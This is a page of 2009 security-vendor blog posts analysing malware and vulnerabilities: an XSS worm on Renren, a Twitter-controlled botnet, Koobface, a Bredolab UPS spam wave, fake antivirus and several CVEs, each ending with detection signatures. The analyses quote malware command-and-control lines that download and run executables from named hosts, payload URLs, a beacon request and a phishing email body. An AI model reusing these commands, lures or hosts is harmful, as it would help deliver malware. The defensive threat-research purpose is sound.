Posts

Pink Floyd worm in 'Chinese Facebook' (Aug 25, 2009)

SonicWALL UTM Research team observed a new cross-site scripting worm in the wild. It is distributed within a Chinese popular social network website renren.com.

Renren, which means “everyone” in Chinese is China’s largest online community with more than 22 million active users; it is similar to Twitter or Facebook, as it allows users to share various information, including pictures and videos with each other.

The worm itself is contained in JavaScript and is very similar to April’s Mike Mooney Twitter worm. This worm abuses the fact that users can point to Flash movies, coupled with the small flaw in the video player code used by the Renren.com site.

Worm masquerades as a flash music video of Pink Floyd’s Wish You Were Here and spreads by exploiting a cross-site scripting hole. It contains a maliciously crafted Flash component loaded with an AllowScriptAccess=”always” parameter.

By default, this parameter is set to “sameDomain”, which means that a Flash object can only access the webpage if it was retrieved from the same domain. Setting this parameter to “always”, the Flash file can directly access any element of the local webpage, including cookies.

The flash file is used to execute the JavaScript code present in the message body and load a script called evil.js from an external domain. The domain hosting the Javascript is registered to YanChun Liu in Henan province of China. JavaScript code is used to exploit a cross-site scripting (XSS) flaw present in the website and spread the worm through its API.

There is a string “I’m not a malicious worm.” in the worm and, in fact, it doesn’t do anything other than spread.

screenshot

There are also comments in the code that are lyrics from a German’s musician’s Maximilian Hecker “Rose” song.

screenshot

This malware is also known as W32/PinkRen-A [Sophos], TrojanDownloader:SWF/Nerner.A [Microsoft], JS.Frienren [Symantec].

SonicWALL Gateway AntiVirus provides protection against this malware via Agent.EKC#Js (Trojan) and Agent.BE#Swf (Trojan) signatures.

Firebird SQL op_connect_request DoS (Aug 20, 2009)

Firebird is a relational database offering many ANSI SQL standard features that runs on Linux, Windows, and a variety of Unix platforms. It can be run under three different types of architectures: Classic Server, Embedded Server, and Superserver. In typical client/server environments Firebird runs as either Classic Server or Superserver. In Classic Server mode, Firebird creates a separate process for every client connection, each with its own cache. Alternatively running in Superserver mode, Firebird executes as a single process serving all the connections, and using threads to handle requests.

Firebird database server listens on port TCP/3050. All messages transferred through this port are defined as an XDR specification, which defines a common data representation format for remote function calls as bellow:

Offset Type Size Description ------ -------- ---- ----------- 0x0000 xdr_long  4 opcode  0x0004 data	 n depends on the opcode 

The content and length of the data field depends on the opcode. It has been observed that the opcode called op_connect_request(0x00000035) has the following structure:

Offset Type Size Description ------ -------- ---- ----------- 0x0000 xdr_long 4 opcode 0x35 0x0004 xdr_short 2 p_req_type 0x0006 xdr_short 2 p_req_object 0x0008 xdr_long 4 p_req_partner

A denial of service vulnerability exists in Firebird database server when running in Superserver mode. Specifically, the vulnerability is due to an exception handling error when processing op_connect_request(0x35) messages with an overly long data section. An attacker can exploit this issue by sending an op_connect_request message with a large data to cause a denial of service to the Firebird database server. The affected service must be manually restarted.

SonicWALL UTM research team has released an IPS signature that will detect and block generic attack attempts addressing this issue. The IPS signature is listed as bellow:

  • 4252 Firebird SQL op_connect_request DoS

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2009-2620.

New Botnet controlled via Twitter (Aug 18, 2009)

SonicWALL UTM Research team observed a new Botnet family that uses social networking services like Twitter, Jaiku, Tumblr as its Command & Control (C&C) server mechanism.

The status messages on the social blogging sites serve as the C&C commands that contain links to download malicious payload. The status messages are Base-64 encoded.

Example Base-64 encoded status message shown below:

aHR0cDovL2JpdC5seS9HaHVVdSBodHRwOi8vYml0Lmx5L1FqC

decodes to

http://bit.ly/GhuUu -> http://rifers.org/paste/content/paste/9506/body [Malware payload]

The name of one such account used for issuing C&C commands on these blogging sites – upd4t3. Twitter, Jaiku, and Tumblr have already suspended the account in question but there could be more such accounts.

This Bot is packed using MPRESS packer. It is also known as Trojan:Win32/Svelta.A [Microsoft], Trojan-Banker.Win32.Banker.alvx [Kaspersky], and W32/Bancos.MSB [Eset].

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Suspicious#mpress (Worm),GAV: Suspicious#mpress.2 (Worm), and GAV: Agent.CMCF (Trojan) signatures.

Screenshot of the Twitter C&C account –

screenshot

Screenshot of the Jaiku C&C account –

screenshot

MS Workstation Service Vulnerability (Aug 13, 2009)

Microsoft Windows Workstation service is a new service added in Windows XP, Vista, Server 2003, and thereafter. It is started to notify selected users and administrators of administrative alerts automatically. If this service is disabled, any services that explicitly depend on it will fail to start.

The Workstation Service can be accessed through the DCE-RPC interface. And its numerous methods can be accessed by other processes through the Remote Procedure Call (RPC) interface (UUID: 6bffd098-a112-3610-9833-46c3f87e345a). The interface is accessible through several endpoints and transports such as “wkssvc”. After the interface is successfully bound through a transport, the user is allowed to call the provided RPC methods.

The Workstation Service provides multiple methods through its RPC interface. The methods perform tasks such as user information queries, domain changes and additions among other things. A list of some of the supplied methods is shown below:

  • NetrGetJoinInformation
  • NetrJoinDomain2
  • NetrWkstaGetInfo
  • NetrWkstaSetInfo

The NetrGetJoinInformation method, which is listed above, is responsible for retrieving information about the workgroup or domain to which the specified computer is joined. According to MSDN Windows API definition, the syntax of NetrGetJoinInformation method is defined as bellow:

unsigned long NetrGetJoinInformation( [in, string, unique] WKSSVC_IMPERSONATE_HANDLE ServerName, [in, out, string] wchar_t** NameBuffer, [out] PNETSETUP_JOIN_STATUS BufferType );

A double free vulnerability exists in the vulnerable version of Microsoft Windows Workstation service. Specifically, the vulnerability is due to improper handling of the requests for the NetrGetJoinInformation method with a specially crafted NameBuffer value.

Remote authenticated attackers can exploit this vulnerability to inject arbitrary code and execute with the privileges of the affected service, which is SYSTEM by default.

SonicWALL UTM research team has released an IPS signature that will detect and block generic attack attempts addressing this issue. The IPS signature is listed as bellow:

  • 4288 MS Windows Workstation Service Memory Corruption Attempt (MS09-041)

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2009-1544. Microsoft has referred this vulnerability in its security advisory MS09-041.

New Koobface worm variant (Aug 11, 2009)

SonicWALL UTM Research team found a new variant of Koobface worm last week on August 7, 2009. It’s packed using UPX.

There are three major enhancements in this new variant of Koobface,

a) Earlier drive-by sites had a page that looked like YouTube video page but now they have switched to a Facebook video look-alike page.

b) In past, the message tweeted was “My home video 🙂 [URL]”, now they randomize it by adding “LOL”, “HA-HA-HA”, “OMFG!” etc, so each tweet is unique.

c) The link is also unique with an appended random number, so after URL shortening it is still unique:
hxxp://uppinorr.se/pub1icm0vies/?[RANDOM] -> hxxp://bit.ly/[RANDOM]

The malware performs following activities upon execution:

  • Deletes the original file that was downloaded and executed by the user
  • Drops files (Windows)ld12.exe, (Windows)prxid93ps.dat and executes ld12.exe
  • Creates a registry entry to ensure that it starts on system reboot:
    HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunsysldtray: “c:windowsld12.exe”
  • Checks for Internet connectivity by sending GET request to www.google.com
  • If Internet is available, it connects to the C&C server located at upr0306.com and receives command to download malicious files:

    #PID=1000
    STARTONCEIMG|http://web.reg.md/1/p.jpg
    STARTONCE|http://web.reg.md/1/prx.exe [Detected as GAV: FakeAv.OT_2 (Trojan)]
    START|http://web.reg.md/1/pp.10.exe [Detected as GAV: Koobface.NBH_5 (Worm)]
    #BLACKLABEL
    EXIT

This malware is also known as Worm:Win32/Koobface.gen!D [Microsoft], Net-Worm.Win32.Koobface.bgr [Kaspersky], Mal/KoobHeur-A [Sophos].

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Koobface.BGR (Worm) signature.

Screenshots of Koobface worm drive-by sites in action can be seen below:

Facebook video page look-alike:

screenshot

Download of the Koobface worm when user attempts to download flash player:

screenshot

Page showing unique tweets with shortened malicious link:

screenshot

MS IS Stylesheet Memory Corruption (Aug 7, 2009)

Microsoft Internet Explorer browser provides web developers with the ability to dynamically modify, and style, a web page via the Document Object Model (DOM) and Cascading Style Sheets (CSS). The Document Object Model is a cross-platform and language-independent convention used for representing and interacting with objects in HTML, XHTML and XML documents. The browser supports both the Javascript and JScript scripting languages. JScript can be used to access and modify a web page’s underlying DOM structure. The appearance of a page is mainly manipulated by the use of CSS. This technology is used to define the aesthetic aspects of a web page such as fonts, colors and spacing.

Styles are defined and stored either inline or within external style sheets. The following example code snippet illustrates the use of an inline style definition:

 p { color: red; } 

In the above example, a single rule is defined for the paragraph HTML element. Internet Explorer is instructed to style all text within the p tag with the color red. JScript is capable of accessing the stylesheets within a web page using the DOM property document.styleSheets. This property is a collection of styleSheet objects, which can contain zero or more CSS rules. The property can be used to delete or modify existing CSS rules. An example of its usage is shown:

 var testStyle = document.styleSheets[3].rules[0].style; 

This above code creates a reference to a CSS rule which contains methods and attributes related to the style object. This reference can then be used to modify the style definition for the associated CSS rule. Internet Explorer exposes an additional styleSheet property, cssText, which can be used to set or retrieve the text representation of the CSS rules. An example of the usage of this property is shown:

 document.styleSheets[1].cssText = "p { color: green; }"; 

A memory corruption vulnerability exists in Microsoft Internet Explorer. It is created by a design error in the way the browser accesses an object that has been deleted. When a cssText property of a styleSheet is assigned a new value, as shown in the last example code snippet, the browser does not properly clean up the previous underlying style object which is replaced by the new assignment. A JScript reference to a style object will remain in memory even after the cssText reassignment.

A remote attacker can exploit this vulnerability by enticing target users to visit a crafted web page that references and attempts to use a style object left in memory after a cssText reassignment. This can potentially cause memory corruption, overwriting critical memory, and allow for the injection and execution of arbitrary code.

Successful exploitation may result in code execution with the privileges of the logged in user. Exploitation of this vulnerability resulting in code execution is not considered to be a trivial task. Upon unsuccessful exploitation, the affected browser may terminate as a result of an invalid memory access.

SonicWall has developed and released an IPS signature that detects and blocks a specific exploit targeting this vulnerability. Generic detection of attack attempts is not feasible as it would require logical analysis of all script contained within a given web site. The IPS signature released to address this vulnerability is:

  • 4236 – MS IE Stylesheet Memory Corruption PoC (MS09-034)

The vulnerability has been assigned CVE-2009-1919 by Mitre.org. The vendor has released a security bulletin to address this flaw.

UPS Invoice spam – Bredolab.X Trojan (Aug 5, 2009)

SonicWALL UTM Research team observed a new wave of the UPS invoice spam campaign starting today morning. The email has a zip archived attachment which contains the new Bredolab Trojan variant.

SonicWALL has received more than 4,000 e-mail copies of this malware so far. The e-mail looks like:

Attachment:

  • UPSNR_7a04d392.zip (contains UPSNR_7a04d392.exe)
  • UPSNR_05fa2628.zip (contains UPSNR_05fa2628.exe)
  • UPSNR_8d1cb9a4.zip (contains UPSNR_8d1cb9a4.exe)

Subject: UPS Tracking Number [7-digit alpha-numeric number]

Email Body:
————————
Dear customer!

We were not able to deliver postal package you have sent on the 9th of July in time because the addressee’s address is erroneous.
Please print out the invoice copy attached and collect the package at our department.

Your United Parcel Service of America
————————

The e-mail message looks like below:

screenshot

The executable file inside the zip attachment has an icon disguised as a Microsoft Excel sheet file:

screenshot

The Trojan when executed performs following host level activity:

  • Drops a copy of itself as (Windows System Folder)Startupdfqupd32.exe
  • Deletes the original file

It tires to connect to mudstrang.ru domain and downloads an encrypted configuration file via following HTTP request to it:

  • GET /def/controller.php?action=bot&entity_list=&uid=&first=1&guid=615903122&v=15&rnd=8520045

The Trojan is also known as trojan Mal/Bredo-A [Sophos] and TR/Crypt.ZPACK.Gen [AntiVir].

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Bredolab.X (Trojan) signature.[4,379,258 hits recorded starting August 5, 2009].

screenshot

New Variants of Fake Anti-Virus Software (Aug 5, 2009)

August 5, 2009

Rogue anti-virus software comes in many different names, some of which are Antivirus Plus, Advanced Virus Remover, Secret Service, Antivirus Agent Pro, etc. However, their behavior is very similar.

Once installed, the rogue software starts to scan the user’s system immediately. After the scan, reports of non-existent threats are presented to the user as a scare tactic.

The reports usually contain many fake high risk infections that trigger the user to click the “remove threats” button on the anti-virus window. When this button is clicked, the user gets license or registration errors.

The user is forced to buy the software in order to remove the malware on the system. The licenses are sold on a website that is opened up when the user clicks the “get license” button. The websites usually offer huge discounts, lifetime support, money back guarantee, etc.

SonicWALL is blocking the 4 variants mentioned above with these signatures: GAV: SecretService_2 (Trojan), GAV: AntiVirusAgentPro (Adware), GAV: AdvancedVirusRemover.A_3 (Adware), GAV: AntiVirusPlus.KV (Trojan).

Here are screenshots of two fake AV software’s main windows:

main1

main2

Here’s how fake AVs report non-existent threats:

rep1

rep2

rep3

Here’s how fake AVs try to sell their licenses:

lic1

lic2

lic3

SonicWALL UTM Research team is proactively scanning domains that host fake anti-virus variants. We create signatures for each variant we find.

Here are statistics for some of those signatures:

sig1

sig2

sig3

SSL Certificate Null Byte Poisoning (July 31, 2009)

Multiple browsers are theoretically prone to a security-bypass vulnerability. The problem is due to improper validation of the domain name in a signed Certificate Authority (CA) certificate. Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks.

Dan Kaminsky and Moxie Marlinspike, while working separately, have discovered the same vulnerability that would affect many SSL implementations. Basically when the vulnerable browsers check the domain name contained in the attacker’s certificate, they stop reading any characters that follow a null byte (x00 or ) character. The vulnerability has been assigned as CVE-2009-2408.

The whole trick is to get a CA to sign a certificate for a subdomain containing a null byte. An example would be paypal.com.malicious.com, where “paypal.com” is the subdomain and “” is the null byte. Firefox and other browsers theoretically can be fooled into reading this certificate as if it were coming from PayPal’s web site. This allows the attacker to steal the victim’s PayPal credential.

To solve this problem, both CAs and browser developers have to take actions. For CAs, they must stop issuing certificate that contains a null byte. (VeriSign, one of the lagest CAs, claims that “No certificates under the VeriSign brand or sub-brands have a domain containing a null character”.) Meanwhile, in order to prevent attacks using existing CA-signed certificates or self-signed certificates (which contain a null byte as subdomain), developers of browsers have to fix their SSL implementations and continue reading the domain name when a null byte is encountered.

SonicWALL has released an IPS signature that will detect and prevent attacks targeting this vulnerability. The signature to address this vulnerability is:

  • 1266 SSL Server Certificate Null Byte Poisoning Exploit

Adobe Flash 0-day exploit (July 22, 2009)

SonicWALL UTM Research team found reports of new 0-day vulnerability (CVE-2009-1862) in Adobe Flash player v9 and v10 being exploited in the wild via malicious drive-by sites.

The exploit is being actively served in the wild via following URL that is found to be injected into pages of infected websites:

  • sorla.us/(REMOVED)x/mail.asp

The above page will only load with a valid referrer field containing the URL of one of the infected pages. The active server page contains script to identify user’s browser environment and based on that loads one of the following pages:

  • If browser is not Internet Explorer, iframe URL- sorla.us/(REMOVED)x/ff.html
  • If browser is Internet explorer and has flash ActiveX installed, iframe URL- sorla.us/(REMOVED)x/ie.html
  • if browser is Internet Explorer and script cannot create a valid flash ActiveX object, iframe URL- sorla.us/(REMOVED)x/mpg.html

The code snippet can be seen below:

screenshot

In the first two cases, ff.html and ie.html contains JavaScript to download and run malicious Shockwave flash file that exploits 0-day vulnerability in Adobe Flash player:

  • sorla.us/(REMOVED)x/xp.swf [Detected as GAV: Pidief_2 (Exploit)]

It also downloads XORed Backdoor Trojan executable file from following URL:

  • sorla.us/(REMOVED)x/xor.gif [Detected as GAV: Agent.ROX (Trojan)]

Screenshot of 0-day exploit in action causing the flash player object and browser to crash can be seen below:

screenshot

In the third case, mpg.html page contains JavaScript that further checks for the presence of specific host AntiVirus software from Kaspersky and McAfee. If the AntiVirus software is not present then it tries to exploit Microsoft DirectShow Msvidctl vulnerability.

The code snippet for AntiVirus presence detection can be seen below:

screenshot

SonicWALL Gateway AntiVirus provides protection against this threat via GAV: Pidief (Exploit), GAV: Pidief_2 (Exploit), GAV: Pidief_3 (Exploit) and GAV: Agent.ROX (Trojan) signatures.